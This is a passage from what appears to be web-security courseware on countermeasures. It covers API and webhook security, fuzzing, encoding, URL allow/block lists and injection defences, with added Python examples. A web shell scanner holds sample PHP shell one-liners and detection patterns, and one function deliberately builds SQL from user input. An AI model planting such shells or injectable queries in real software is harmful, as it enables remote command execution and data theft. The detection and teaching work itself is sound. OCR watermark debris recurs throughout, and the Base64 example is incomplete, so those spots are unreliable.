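# $var($_GET[...]) : function name hidden in a variable, argument from request
VARIABLE_CALL = re.compile(r"\$\w+\s*\(\s*" + REQUEST_INPUT)
# eval(base64_decode( ... : the classic one-line shell
EVAL_DECODED = re.compile(r"\beval\s*\(\s*(?:" + "|".join(OBFUSCATION) + r")\s*\(")


def scan_php(source: str) -> list:
    """Return (rule_name, weight) findings for one PHP source file."""
    findings = []
    for m in RISKY_CALL.finditer(source):
        if re.search(REQUEST_INPUT, m.group(2)):
            findings.append(("request_input_to_" + m.group(1), 3))
    if VARIABLE_CALL.search(source):
        findings.append(("variable_call_with_request_input", 2))
    if EVAL_DECODED.search(source):
        findings.append(("eval_of_decoded_payload", 3))
    for fn in OBFUSCATION:
        if re.search(r"\b" + fn + r"\s*\(", source):
            findings.append(("obfuscation_" + fn, 1))
    return findings


def score_php(source: str) -> int:
    return sum(weight for _, weight in scan_php(source))


def classify(source: str, threshold: int = 2) -> str:
    return "suspicious" if score_php(source) >= threshold else "clean"


def scan_tree(files: dict) -> dict:
    """Scan {path: source} and return only the files worth a human look."""
    return {path: score_php(src) for path, src in files.items()
            if classify(src) == "suspicious"}


# Constructed sample files (not real malware, just the shapes a scanner keys on).
SAMPLE_FILES = {
    "uploads/img.php": "<?php if(isset($_REQUEST['cmd'])){ system($_REQUEST['cmd']); } ?>",
    "cache/x.php": "<?php eval(base64_decode($_POST['p'])); ?>",
    "inc/helper.php": "<?php $f = 'sys'.'tem'; $f($_GET['c']); ?>",
    "hello.php": "<?php $n = $_GET['name'] ?? 'guest'; echo 'Hi '.htmlspecialchars($n); ?>",
    "cron/rotate.php": "<?php exec('logrotate /etc/logrotate.conf', $out); ?>",
}

if __name__ == "__main__":
    for path, score in sorted(scan_tree(SAMPLE_FILES).items()):
        print(f"{score:2d}  {path}  {[r for r, _ in scan_php(SAMPLE_FILES[path])]}")
```

The constant-argument exec() in cron/rotate.php is deliberately left unflagged: the signal is request input reaching a risky function, not the function name alone.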

Screenshot of Web Shell Detector v1.62
Some web shell detection tools are listed below:
▪ FireEye Network Security (https://www.fireeye.com)
▪ NeoPI (https://github.com)
▪ AntiShell Web Shell Hunter (http://antishell.com)
▪ Astra (https://www.getastra.com)

Secure API Architecture
API is a popular technology that acts as a gateway for communication and integrates different applications using the web. API is widely employed due to its advanced techniques and its use of the prevailing infrastructure. It is vulnerable to the latest and sophisticated cyber-attacks due to various security flaws induced by poor programming practices and also due to its transparency. To safeguard the API from these attacks, security professionals and developers need to establish a secure API architecture, effective security strategies, and mitigation policies.
API architecture is built using an API gateway consisting of firewalls that work as a server to control the traffic and detect all possible attacks. Executing the security policy for the API security architecture is achieved by isolating the API implementation and API security into different layers. These layers emphasize that the API design and API security perform different roles that require a different field of expertise. It focuses on the logical separation of concerns, where one emphasizes the knowledge of solving the right problem at the right time.
Under a secure API architecture, the API developer focuses only on the application domain, ensures that all of the API is properly designed, and helps in integrating the API with different applications. The security process of the published API is implemented by the API security professional; hence, the API developer need not be concerned with securing the published API.
Only API security professionals have the authority to apply security policies to APIs in the organization. These professionals mainly focus on identity, threats in the API, and data security. Hence, they need advanced and appropriate tools to perform security tasks, which are separate from the API implementation. Security professionals use API gateways that are hardened appliances available in both physical and virtual forms. These gateways are installed in the demilitarized zone (DMZ) of an organization. The API gateway also acts as a secure proxy between the internal application and the external public Internet. It provides many security capabilities and controls to the API security admin, such as access control, threat detection, confidentiality, integrity, audit management, authentication, message validation, and rate limiting of all the APIs published by the organization.

Figure 14.9: Secure API architecture

API Security Risks and Solutions
Source: https://www.owasp.org
According to OWASP, the following are the top 10 API Security Risks and Solutions:
API Risk: Broken Object Level Authorization
Solutions:
▪ Perform object-level authorization checks for every function accessing the data source with input from the user
▪ Scrutinize the implementation of the authorization policies
▪ Implement a robust access control policy for random and unpredictable object ID values
API Risk: Broken User Authentication
Solutions:
▪ Use standard and uniform authentication mechanisms for all the API endpoints
▪ Examine and implement the authentication requirements within the Application Security Verification Standard (ASVS)
▪ Make sure to have strong business requirements before exposing unauthenticated API endpoints publicly
API Risk: Excessive Data Exposure
Solutions:
▪ Ensure that proper filtering is performed on the server side and not on the client side
▪ Scrutinize the data flow from the endpoint to the client
API Risk: Lack of Resources and Rate Limiting
Solutions:
▪ Ensure appropriate rate-limiting controls are in place
▪ Use the OWASP Automated Threat Handbook as a knowledge source for preventing bots from consuming your resources
API Risk: Broken Function Level Authorization
Solutions:
▪ Avoid function-level authorization
▪ Use simple and standard authorization and enable the default setting to deny
API Risk: Mass Assignment
Solutions:
▪ Do not expose the internal variable or object names as inputs
▪ Ensure whitelisting of all the properties that the client can update
API Risk: Security Misconfiguration
Solutions:
▪ Perform the hardening process against the API continuously
▪ Use scanning tools and human reviews to examine the entire API stack for security misconfigurations
API Risk: Injection
Solutions:
▪ Perform input validation and whitelisting
▪ Implement a parameterized interface for processing inbound API requests
▪ Ensure that the filtering logic limits the number of records returned
API Risk: Improper Assets Management
Solutions:
▪ Maintain a proper inventory of all API environments including production, staging, testing, and development
▪ Conduct a security review of all APIs, mainly focusing on standardizing functions
▪ Create a risk level ranking of the APIs and improve the security for APIs having a higher risk level
API Risk: Insufficient Logging and Monitoring
Solutions:
▪ Use a standard logging format for all the APIs that support incident response activities
▪ Regularly monitor all the API endpoints in all phases of production, staging, testing, and development
Table 14.5: OWASP Top 10 API Security Risks and Solutions

Best Practices for API Security

Various best practices for securing APIs against cyberattacks are as follows:
▪ Use the HTTPS protocol through SSL/TLS certificates that support encryption techniques and provide a secure connection between the server and the client
▪ Use server-generated tokens embedded in HTML as hidden fields for validating the incoming request and to check if it is from an authenticated source
▪ Sanitize the data to eliminate the malicious script and perform proper validation of the user input
▪ Use an optimized firewall to ensure that all the unused, unnecessary files and permissive rules are revoked
▪ Use IP whitelisting to create a list of trusted IP addresses or IP ranges to access APIs and to limit the access to only trusted users or components
▪ Use the rate-limiting feature to limit the number of API calls made by the client in a particular time frame
▪ Maintain and monitor access logs regularly to help in detecting anomalies and to take precautionary measures in the future
▪ Implement a pagination technique that can divide a single response into several fragments so that the payloads are not oversized
▪ Use parameterized statements in SQL queries to prevent inputs that include entire SQL statements

ical andCountermensores
Mackin ©by E-Comel
Copyright
▪ Perform input validation on the server side instead of the client side to prevent bypassing attacks
▪ Conduct regular security assessments to secure all the API endpoints using automated tools
▪ Regularly monitor and perform continuous auditing of the API and analyze the workflows to prevent any attacks
▪ Use tokens to establish trusted identities and to control access to services and resources
▪ Use signatures to ensure that only authorized users can decrypt or modify the data
▪ Employ packet sniffers to track events related to information disclosure and to detect insecure API calls
▪ Use techniques such as quotas and throttling to control and track the API usage and to set the API request limit
▪ Implement API gateways to authenticate the traffic and control and analyze the usage of APIs
▪ Implement advanced techniques to prevent sophisticated human-like bots from accessing the APIs
▪ Implement multifactor authentication and use authentication protocols such as AppToken, OAuth2, and OpenID Connect to authenticate the users and applications in the API
▪ Document audit logs before and after every security event, and make sure to sanitize the log data to prevent log injection attacks

ical andCountermensores
Mackin ©by E-Comel
Copyright
Best Practices for Securing Webhooks

Various best practices for securing webhooks are as follows:
▪ Use HTTPS instead of HTTP to safeguard the data from being exposed when in transit
▪ Use shared authentication secrets such as HTTP basic authentication for all the webhooks to prevent any random malicious data
▪ Implement webhook signing to verify the data received from the ESPs (Email Service Providers) and use the constant time-compare function
▪ Track event_id to avoid unintentional double-processing of the same events through replay attacks
▪ Ensure that the firewall rejects webhook calls from unauthorized sources other than the ESP's IP addresses
▪ Use rate limiting on webhook calls in the web server to control the incoming and outgoing traffic
▪ Compare the request timestamp X-Cld-Timestamp of the webhook with the current timestamp to prevent timing attacks
▪ Validate the X-OP-Timestamp within the threshold of the current time
▪ Ensure that the event processing is idempotent to prevent event receipts replication
▪ Ensure that the webhook code responds with 200 OK (success) instead of 4xx or 5xx statuses in case of errors to ensure that the webhooks are not deactivated
▪ Ensure that the webhook URL supports the HTTP HEAD method to retrieve meta-information without transferring the entire content

Module4 Page1952 ical andCountermensores


Mackin Copyright
by E-Comel
©
▪ Use threaded requests to send multiple requests at the same time and to update data in the API rapidly
▪ Make sure that the tokens are stored against the store_hash and not against the user data
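The webhook receiver below is an added example, not code from the courseware or from any ESP: it combines the signing, constant-time compare, timestamp threshold, event_id tracking, and always-200 rules listed above. The header name X-OP-Timestamp comes from the list; the X-Signature header, the shared secret, and the HMAC-SHA256-over-"timestamp.body" signing scheme are assumptions for the demo.

```python
import hashlib
import hmac
import json
import time

# Constructed values for the demo; a real secret comes from the ESP's configuration.
WEBHOOK_SECRET = b"constructed-shared-secret"
TIMESTAMP_THRESHOLD_SECONDS = 300  # accept X-OP-Timestamp only within 5 minutes of now

# Stands in for durable storage of already processed event_ids.
processed_event_ids = set()


def sign_payload(secret: bytes, timestamp: str, body: bytes) -> str:
    """Signature the sender computes (assumed scheme): HMAC-SHA256 over timestamp + '.' + body."""
    return hmac.new(secret, timestamp.encode() + b"." + body, hashlib.sha256).hexdigest()


def verify_webhook(headers: dict, body: bytes, now=None) -> tuple:
    """Return the (HTTP status, reason) the endpoint should answer with."""
    now = time.time() if now is None else now
    ts = headers.get("X-OP-Timestamp", "")
    sig = headers.get("X-Signature", "")

    # 1. Timestamp within threshold: stale or future-dated deliveries are treated as replays.
    try:
        if abs(now - float(ts)) > TIMESTAMP_THRESHOLD_SECONDS:
            return 200, "stale timestamp; ignored"
    except ValueError:
        return 200, "missing or malformed timestamp; ignored"

    # 2. Constant-time compare: hmac.compare_digest does not stop at the first mismatching
    #    byte, so response time does not reveal how much of a forged signature was right.
    expected = sign_payload(WEBHOOK_SECRET, ts, body)
    if not hmac.compare_digest(expected, sig):
        return 200, "bad signature; ignored"

    # 3. Track event_id so a replayed (or legitimately retried) delivery is processed once.
    event = json.loads(body)
    event_id = str(event.get("event_id", ""))
    if not event_id or event_id in processed_event_ids:
        return 200, "duplicate or missing event_id; ignored"
    processed_event_ids.add(event_id)

    # 4. Answer 200 even when the delivery is dropped, so the ESP does not deactivate the hook;
    #    the reason string is what goes to the application log for monitoring.
    return 200, "processed " + event_id
```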

ical andCountermensores
Mackin ©by E-Comel
Copyright
Web Application Security

After learning the hacking methodologies adopted by attackers of web applications and the tools they use, it is important to learn how to secure these applications from such attacks. A careful analysis of security will help you, as an ethical hacker, to secure your applications. To do so, one should design, develop, and configure web applications using the countermeasures and techniques discussed in this section.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Web Application Security Testing

Web application security testing is a process of conducting security assessment and performance analysis of an application and generating timely reports on its security levels and threat exposures. It is often conducted by security professionals and programmers to test and strengthen the security of an application using the following techniques:

▪ Manual Web Application Security Testing
Manual security testing involves testing a web application using manually designed data, customized code, and some browser extension tools such as SecApps to detect vulnerabilities and weaknesses associated with the applications. It mainly focuses on business logic errors and threat analysis. Security professionals also use other tools such as Selenium, JMeter, Loadrunner, QTP, Bugzilla, and Test Link to perform manual testing.

▪ Automated Web Application Security Testing
It is a technique employed for automating the testing process. Automated testing tools can be used for the rapid discovery of vulnerabilities in a systematic manner so that they can be patched easily. These testing methods and procedures are incorporated into each development stage to report feedback constantly. Changes in every piece of code can be analyzed and developers are instantly notified if any vulnerabilities are detected. Security professionals use tools such as Ranorex Studio, TestComplete, LEAPWORK, Katalon Studio, and Testsigma to carry out automated testing.

▪ Static Application Security Testing (SAST)
Static application testing is also referred to as a white box testing, in which the complete system architecture (including its source code) or application/software to be tested is

Module4 ical andCountermensores


Mackin ©by E-Comel
Copyright
already known to the tester. SAST tools assist developers in testing the source code to discover and report design flaws associated with the application, which can open doors for various attacks. It also ensures that the source code is compliant with defined rules, standards, and guidelines. Security professionals use tools such as Coverity Static Application Security Testing, Appknox, AttackFlow, bugScout, and PT Application Inspector to perform SAST.

▪ Dynamic Application Security Testing (DAST)
Unlike SAST, DAST is known as a black box testing, in which the system architecture or application to be tested is not known to the testers. DAST tools execute on running code to identify issues related to interfaces, requests/responses, sessions, scripts, code injections, authentication processes, etc. They allow testers to discover underlying vulnerabilities or flaws in web applications. DAST tools also use fuzzing, which refers to throwing unexpected and unvalidated test cases at a web page. Security professionals use tools such as Netsparker, Acunetix Vulnerability Scanner, HCL AppScan, Micro Focus Fortify on Demand, and Appknox to perform DAST.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Web Application Fuzz Testing

Web application fuzz testing (fuzzing) is a black box testing method. It is a quality checking and assurance technique used to identify coding errors and security loopholes in web applications. Massive amounts of random data called "fuzz" are generated by fuzz testing tools (fuzzers) and used against the target web application to discover vulnerabilities that can be exploited by various attacks. Attackers employ various attack techniques to crash the victim's web applications and cause havoc in the least possible time. Security personnel and web developers employ this fuzz testing technique to test the robustness and immunity of the developed web application against attacks such as buffer overflow, DoS, XSS, and SQL injection.

Steps of Fuzz Testing

Web application fuzz testing involves the following steps:
▪ Identify the target system
▪ Identify inputs
▪ Generate fuzzed data
▪ Execute the test using fuzz data
▪ Monitor system behavior
▪ Log defects

Fuzz Testing Strategies
▪ Mutation-Based: In this type of testing, the current data samples create new test data, and the new test data will again mutate to generate further random data. This type of testing starts with a valid sample and keeps mutating until the target is reached.
▪ Generation-Based: In this type of testing, the new data will be generated from scratch, and the amount of data to be generated is predefined based on the testing model.
▪ Protocol-Based: In this type of testing, the protocol fuzzer sends forged packets to the target application that is to be tested. This type of testing requires detailed knowledge of the protocol format being tested. It involves writing a list of specifications into the fuzzer tool and then performing the model-based test generation technique to go through all the listed specifications and add the irregularities in the data contents, sequence, etc.
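As an added example (not from the courseware or any fuzzing tool), the mutation-based strategy and the six steps above applied to a constructed target: a small query-string parser that stands in for the application under test. The parser, its bugs, the mutation operators, and the sample input are all assumptions made for the demo; a real fuzzer would send each case as an HTTP request and log the response instead of catching exceptions.

```python
import random


def parse_query(raw: bytes) -> dict:
    """Constructed target with latent input-handling bugs (it trusts the encoding and
    assumes a numeric 'page' parameter is always present)."""
    text = raw.decode("utf-8")
    params = {}
    for pair in text.split("&"):
        key, _, value = pair.partition("=")
        params[key] = value
    params["page"] = int(params["page"])
    return params


# Bytes with special meaning in URLs, SQL, HTML and C strings; a fuzzer's usual seasoning.
SPECIALS = [b"\x00", b"'", b'"', b"%", b"<", b">", b"&", b"=", b"\xff"]


def mutate(sample: bytes, rng: random.Random) -> bytes:
    """Mutation-based strategy: one random change to an otherwise valid sample."""
    data = bytearray(sample)
    choice = rng.randrange(4)
    if choice == 0:                                  # flip one bit
        i = rng.randrange(len(data))
        data[i] ^= 1 << rng.randrange(8)
    elif choice == 1:                                # insert a special byte
        i = rng.randrange(len(data) + 1)
        data[i:i] = rng.choice(SPECIALS)
    elif choice == 2 and len(data) > 1:              # delete a byte
        del data[rng.randrange(len(data))]
    else:                                            # oversize the payload
        data.extend(data[:8] * rng.randrange(2, 64))
    return bytes(data)


def fuzz(target, sample: bytes, iterations: int = 500, seed: int = 1) -> dict:
    """Generate fuzzed data, execute the test, monitor behaviour, log defects.
    Returns the first crashing input seen for each exception class."""
    rng = random.Random(seed)
    defects = {}

    def run(case: bytes) -> None:
        try:
            target(case)
        except Exception as exc:            # any unhandled exception is a logged defect
            defects.setdefault(type(exc).__name__, case)

    # Deterministic pass: substitute every special byte at every position of the sample.
    for i in range(len(sample)):
        for special in SPECIALS:
            run(sample[:i] + special + sample[i + 1:])
    # Random pass: mutated data is mutated again, as the strategy describes, with regular
    # returns to the valid seed so the cases do not drift into pure noise.
    current = sample
    for _ in range(iterations):
        current = mutate(current, rng)
        run(current)
        if rng.random() < 0.5 or len(current) > 4096:
            current = sample
    return defects


if __name__ == "__main__":
    for name, case in fuzz(parse_query, b"user=alice&page=2").items():
        print(name, case)
```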
Fuzz Testing Scenario

The diagram below shows an overview of the main components of the fuzzer. An attacker script is fed to the fuzzer, which in turn translates the attacks to the target as HTTP requests. These HTTP requests will get responses from the target and all the requests and their responses are then logged for manual inspection.

[Figure: attacker script → fuzzer program → HTTP client → target; requests and responses go to logs]

Figure 14.99: Web application fuzz testing scenario

Fuzz Testing Tools:
▪ WSFuzzer (https://www.owasp.org)
▪ WebScarab (https://www.owasp.org)
▪ Burp Suite (https://portswigger.net)
▪ HCL AppScan® Standard (https://www.hcltech.com)
▪ Peach Fuzzer (https://www.peach.tech)

ical andCountermensores
Mackin ©by E-Comel
Copyright
Source Code Review

Source code reviews are used to detect bugs and irregularities in the developed web applications. They can be performed manually or using automated tools to identify specific areas in the application code that handle functions regarding authentication, session management, and data validation. They can identify un-validated data vulnerabilities and poor coding techniques of developers that allow attackers to exploit the web applications.

[Figure: Manual Code Review vs. Automated Code Review]
Encoding Schemes

Encoding is the process of converting source information into its equivalent symbolic form, which helps in hiding the meaning of the data. At the receiving end, the encoded data is decoded into the plaintext format. Decoding is the reverse process of encoding. Web applications employ different encoding schemes for their data to safely handle unusual characters and binary data in the intended manner.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Types of Encoding Schemes

▪ URL Encoding
Web browsers/web servers permit URLs to contain only printable characters of ASCII code that can be understood by them for addressing. URL encoding is the process of converting a URL into a valid ASCII format so that data can be safely transported over HTTP. Several characters in this range have special meanings when they are mentioned in the URL scheme or HTTP protocol. Thus, these characters are restricted. URL encoding replaces unusual ASCII characters with "%" followed by the character's two-digit ASCII code expressed in the hexadecimal format, such as:

▪ HTML Encoding
An HTML encoding scheme is used to represent unusual characters so that they can be safely combined within an HTML document. HTML encoding replaces unusual characters with strings that can be recognized while the various characters define the structure of the document. If you want to use the same characters as those contained in the document, you might encounter problems. These problems can be overcome using HTML encoding. It defines several HTML entities to represent particular unusual characters such as:
○ &amp; &
○ &lt; <
○ &gt; >

▪ Unicode Encoding
Unicode encoding is of two types: 16-bit Unicode encoding and UTF-8.
○ 16-bit Unicode Encoding
It replaces unusual Unicode characters with "%u" followed by the character's Unicode code point expressed in the hexadecimal format.
%u2215 is /
○ UTF-8
It is a variable-length encoding standard that expresses each byte in the hexadecimal format and prefixes it with %.
%c2%a9 is ©
%e2%89%a0 is ≠

ical andCountermensores
Mackin ©by E-Comel
Copyright
▪ Base64 Encoding
The Base64 encoding scheme represents any binary data using only printable ASCII characters. In general, it is used for encoding email attachments for safe transmission over SMTP and also for encoding user credentials, for example:
cake 01100011 01100001 01101011 01100101
Base64 Encoding: 011000 110110 000101 101011 011001 010000 000000 000000

▪ Hex Encoding
The hex encoding scheme uses the hex value of every character to represent a collection of characters for transmitting binary data. For example:
Hello 48656c6c6f
Jason 4a61736f6e
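The encodings above, as an added example (not code from the courseware) using only Python's standard library: each scheme is produced from the page's own sample values, and a canonicalize() step shows why input validation has to run on the decoded form rather than on the raw request, including the double-encoded case (%25 in front of the real escape). The function names and the validation rule are assumptions for the demo.

```python
import base64
import html
import re
from urllib.parse import quote, unquote


def url_encode(text: str) -> str:
    """URL encoding: each unusual byte becomes '%' plus two hex digits (non-ASCII is UTF-8 first)."""
    return quote(text, safe="")


def html_encode(text: str) -> str:
    """HTML encoding: structural characters become entities such as &lt;, &gt; and &amp;."""
    return html.escape(text, quote=True)


def unicode16_decode(text: str) -> str:
    """Decode the 16-bit '%uXXXX' form, a legacy notation some servers still accept."""
    return re.sub(r"%u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), text)


def base64_encode(data: bytes) -> str:
    """Base64: every three bytes become four printable characters; '=' pads the last group."""
    return base64.b64encode(data).decode("ascii")


def hex_encode(data: bytes) -> str:
    """Hex encoding: two hex digits per byte."""
    return data.hex()


def canonicalize(value: str, max_rounds: int = 5) -> str:
    """Undo URL, %u and HTML encoding until the value stops changing.
    Repeating the URL step is what catches double-encoded input such as %253C."""
    for _ in range(max_rounds):
        decoded = unquote(unicode16_decode(value))
        if decoded == value:
            break
        value = decoded
    return html.unescape(value)


def is_safe_text_input(value: str) -> bool:
    """Validate the canonical form, not the raw bytes: an encoded '<' is still a '<'."""
    canonical = canonicalize(value)
    return not any(ch in canonical for ch in "<>\"'")
```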

ical andCountermensores
Mackin ©by E-Comel
Copyright
Whitelisting vs. Blacklisting Applications

Web applications have played an important role in the adoption of digital transformation globally. Such rapid development has motivated attackers to compromise system security using different techniques and strategies that exploit the flaws and breaches present in the applications. To thwart these attacks, security professionals need to implement various security policies and testing strategies.

Whitelisting and blacklisting is one such security strategy that can retain the applications, networks, and infrastructures securely. Using this strategy, one can create a list of entities that should be allowed and those that should be blocked. Thus, any malicious software can be effectively blocked before it enters the organizational network.

Application Whitelisting
Application whitelisting specifies a list of application components such as software libraries, plugins, extensions, and configuration files, or legitimate software that can be permitted to execute in the system. It helps in preventing unauthorized execution and spreading of malicious programs. It can also prevent the installation of unapproved or vulnerable applications. Whitelisting provides greater flexibility by providing protection against ransomware and other types of malware attacks on web applications.

Application Blacklisting
Application blacklisting specifies malicious applications or software that are not permitted to be executed in the system or the network. Blacklisting can be performed by blocking malicious applications that can cause potential damage or lead to attacks. Blacklisting is a threat-centric method; it cannot detect modern threats and results in attacks leading to data loss. Hence, it is important to update the blacklist regularly to

ical andCountermensores
Mackin ©by E-Comel
Copyright
defend against the latest malware attacks. Application blacklisting can be performed by adding the names of applications to be blocked at the firewall level or by installing specific software to block the applications.

Blacklisting and whitelisting for basic URL management
URL blacklisting prevents the user from loading web pages from the blacklisted URLs. The user can access all URLs except those in the blacklist. URL whitelisting permits the users to access only specific URLs as exclusions to those that are added to the URL blacklist.

URL whitelisting is performed using the following methods:
○ Allow access to all URLs except the blocked ones: Whitelisting can allow the users to access the rest of the network applications
○ Block access to all URLs except permitted ones: Whitelisting can permit access to a limited list of URLs
○ Define exceptions to very restrictive blacklists: Whitelisting lets users access schemes, subdomains of other domains, specific paths, or ports
○ Allow the browser to open applications: Whitelisting is performed only for specific external protocol handlers so that the browser can automatically execute applications

URL blacklisting is performed using the following methods:
○ Allow access to all URLs except the blocked ones: Blacklisting prevents users from accessing blocked websites
○ Block access to all URLs except permitted ones: Blacklisting blocks access to all malicious URLs
○ Define exceptions to very restrictive blacklists: Blacklisting restricts access to all URLs that are vulnerable to attacks
○ Allow the browser to open apps: Blacklisting prevents the browser from automatically executing applications
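An added example (not from the courseware or any browser policy product) of the URL management methods above as an evaluator: a blocklist of "*" with allowlist exceptions gives "block all except permitted", a blocklist of specific patterns with no allowlist gives "allow all except blocked", and allowlist entries may carve out a scheme, a subdomain set, a path, or a port. The pattern syntax below is invented for the demo and is not a product's syntax.

```python
from urllib.parse import urlsplit


def parse_pattern(text: str) -> dict:
    """Constructed syntax: '*' matches everything; otherwise '[scheme://]host[:port][/path]'.
    A host of '*.example.com' also matches every subdomain, '*' alone matches any host,
    and a path matches itself and everything below it."""
    if text == "*":
        return {"any": True}
    scheme, sep, rest = text.partition("://")
    if not sep:
        scheme, rest = None, text
    hostport, slash, path = rest.partition("/")
    host, _, port = hostport.partition(":")
    subdomains = host.startswith("*.")
    return {
        "any": False,
        "scheme": scheme,
        "host": host[2:] if subdomains else host,
        "subdomains": subdomains,
        "port": int(port) if port else None,
        "path": "/" + path if slash else None,
    }


def matches(pattern: dict, url: str) -> bool:
    if pattern["any"]:
        return True
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    if pattern["scheme"] and parts.scheme != pattern["scheme"]:
        return False
    if pattern["host"] != "*":
        exact = host == pattern["host"]
        below = pattern["subdomains"] and host.endswith("." + pattern["host"])
        if not (exact or below):
            return False
    if pattern["port"] is not None and parts.port != pattern["port"]:  # explicit ports only
        return False
    if pattern["path"] is not None:
        path = parts.path or "/"
        prefix = pattern["path"].rstrip("/") + "/"
        if path != pattern["path"] and not path.startswith(prefix):
            return False
    return True


def is_allowed(url: str, blocklist: list, allowlist: list) -> bool:
    """Allowlist entries are exceptions to the blocklist: an allowlist match wins,
    otherwise any blocklist match blocks, otherwise the URL is allowed."""
    if any(matches(parse_pattern(p), url) for p in allowlist):
        return True
    return not any(matches(parse_pattern(p), url) for p in blocklist)
```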

ical andCountermensores
Mackin ©by E-Comel
Copyright
Application Whitelisting and Blacklisting Tools

Various tools that help security professionals in application whitelisting and blacklisting are discussed below:

▪ Apility.io
Source: https://apility.io
Apility.io is an anti-abuse API that helps security professionals to know if the IP address, domain, or email of a user is blacklisted. It is a collection of various tools delivered "as a service" to help security professionals, product managers, IT shops, enterprises, and start-ups to acquire more details about their potential visitors, users, customers, and threat actors.

ical andCountermensores
Mackin ©by E-Comel
Copyright
Figure 14.102: Screenshot of Apility.io

Some additional application whitelisting and blacklisting tools are as follows:
▪ AutoShun (https://www.autoshun.org)
▪ Cisco Umbrella (https://umbrella.cisco.com)
▪ Alexa Top Sites (https://aws.amazon.com)
▪ APT Groups and Operations (https://docs.google.com)
▪ NordVPN (https://nordvpn.com)

ical andCountermensores
Mackin ©by E-Comel
Copyright
How to Defend Against Injection Attacks

SQL Injection Attacks
○ Limit the length of the user input
○ Use custom error messages
○ Monitor DB traffic using an IDS, WAF
○ Disable commands such as xp_cmdshell
○ Isolate the database server and web server
○ Always use a method attribute set for POST and a low-privileged account for the DB connection
○ Run a database service account with minimal rights
○ Move extended stored procedures to an isolated server
○ Use type safe variables or functions such as IsNumeric() to ensure type safety
○ Validate and sanitize user inputs passed to the database
○ Avoid using dynamic SQL and do not construct queries with the user input
○ Use prepared statements, parameterized queries, or stored procedures to access the database
○ Display less information and use the "RemoteOnly" customErrors mode to display verbose error messages on the local machine
○ Perform proper escaping and character filtering to avoid special characters, strings, and symbols such as single quotes (')
○ Always set the whitelist logically instead of the blacklist to avoid bad code
○ Use Object Relational Mapping (ORM) frameworks to make the conversion of SQL result sets into code objects more consistent
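Three of the countermeasures above side by side, as an added example that is not part of the courseware: the dynamic-SQL lookup the list warns against, the parameterized lookup with an input length limit, and a type-safe ID lookup in the spirit of IsNumeric(). The in-memory sqlite3 database, its rows, and the function names are constructed for the demo.

```python
import sqlite3

MAX_USERNAME_LENGTH = 32  # "limit the length of the user input"


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for the application's user store."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO users (username, password_hash) VALUES (?, ?)",
                     [("alice", "hash-a"), ("bob", "hash-b")])
    return conn


def find_user_dynamic_sql(conn, username: str) -> list:
    """Dynamic SQL built from user input: the input can close the string literal and
    rewrite the WHERE clause, which is the flaw the countermeasures address."""
    query = "SELECT id, username FROM users WHERE username = '" + username + "'"
    return conn.execute(query).fetchall()


def find_user_parameterized(conn, username: str) -> list:
    """Parameterized query: the driver binds the value, so it can only ever be data."""
    if len(username) > MAX_USERNAME_LENGTH:
        raise ValueError("username too long")
    return conn.execute("SELECT id, username FROM users WHERE username = ?", (username,)).fetchall()


def get_user_by_id(conn, raw_id: str) -> list:
    """Type-safe variable: accept only a short ASCII digit string, then bind it as an int,
    so nothing but a number can reach the database."""
    if not (raw_id.isascii() and raw_id.isdigit()) or len(raw_id) > 9:
        raise ValueError("id must be a positive integer")
    return conn.execute("SELECT id, username FROM users WHERE id = ?", (int(raw_id),)).fetchall()
```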

Command Injection Flaws
The simplest way to defend against command injection flaws is to avoid them wherever possible. Some language-specific libraries perform identical functions for many shell commands and some system calls. These libraries do not contain the operating system shell interpreter and hence avoid most shell command problems. For those calls that must still be used, such as calls to backend databases, one must carefully validate the data to ensure that it does not contain malicious content. One can also arrange various requests in a pattern, which ensures that all the given parameters are treated as data instead of potentially executable content.

Most systems call and use stored procedures with parameters that accept valid input strings to access a database, or prepared statements, to provide significant protection, ensuring that the supplied input is treated as data, which reduces but does not completely eliminate the risk involved in these external calls. One can always authorize the input to ensure the protection of the application in question. For this reason, it is important to use the least-privileged accounts to access a database to minimize the attack possibility.

Another robust measure against command injection is to run web applications with only the privileges required to carry out their functions. Therefore, one should avoid running the web server as root or accessing a database as a DBADMIN; otherwise, an attacker may

be able to misuse administrative rights. The use of the Java sandbox in the J2EE environment stops the execution of system commands. External commands are used to check the user information when he/she provides it. Create a mechanism for handling all possible errors, timeouts, or blockages during the calls. Check all the output, return, and error codes from the call to ensure that it performs as expected. Doing so allows users to determine whether something has gone wrong. Otherwise, an attack might occur and never be detected.

Some countermeasures against command injection flaws are as follows:
○ Perform input validation
○ Escape dangerous characters
○ Use language-specific libraries that avoid problems due to shell commands
○ Perform input and output encoding
○ Use a safe API that avoids use of the interpreter entirely
○ Structure requests so that all supplied parameters are treated as data rather than potentially executable content
○ Use parameterized SQL queries
○ Use modular shell disassociation from the kernel
○ Use built-in library functions and avoid calling OS commands directly
○ Implement least privileges to restrict the permissions to execute the OS commands
○ Avoid executing commands such as exec or system without proper validation and sanitization
○ Prevent the shell interpreter within PHP using pcntl_fork and pcntl_exec
○ Implement Python as a web framework instead of PHP for application development
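An added example (not from the courseware) of the "safe API that avoids the interpreter" and "structure requests so parameters are treated as data" points above, in Python: whitelist validation of a hostname, the unsafe shell-string pattern shown but not executed, and subprocess.run with an argument list, a timeout, and a checked return code. The ping -c 1 invocation assumes a Linux ping; everything else uses the standard library.

```python
import re
import subprocess

# Hostname characters only, no leading '-' (so the value cannot be read as an option).
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(\.[A-Za-z0-9-]{1,63})*$")


def validate_hostname(value: str) -> bool:
    """Input validation against a whitelist pattern: shell metacharacters cannot pass."""
    return len(value) <= 253 and bool(HOSTNAME_RE.match(value))


def shell_command_for(host: str) -> str:
    """The unsafe pattern (what os.system / shell=True would run). Returned rather than
    executed, so the reader can see that metacharacters in host survive into the command line."""
    return "ping -c 1 " + host


def run_safely(argv: list, timeout: float = 5.0) -> tuple:
    """Safe API: argv list, no shell interpreter, a timeout, and the exit status is
    returned for the caller to check rather than silently ignored."""
    try:
        result = subprocess.run(argv, shell=False, capture_output=True, text=True, timeout=timeout)
    except subprocess.TimeoutExpired:
        return (-1, "", "timeout")
    except OSError as exc:
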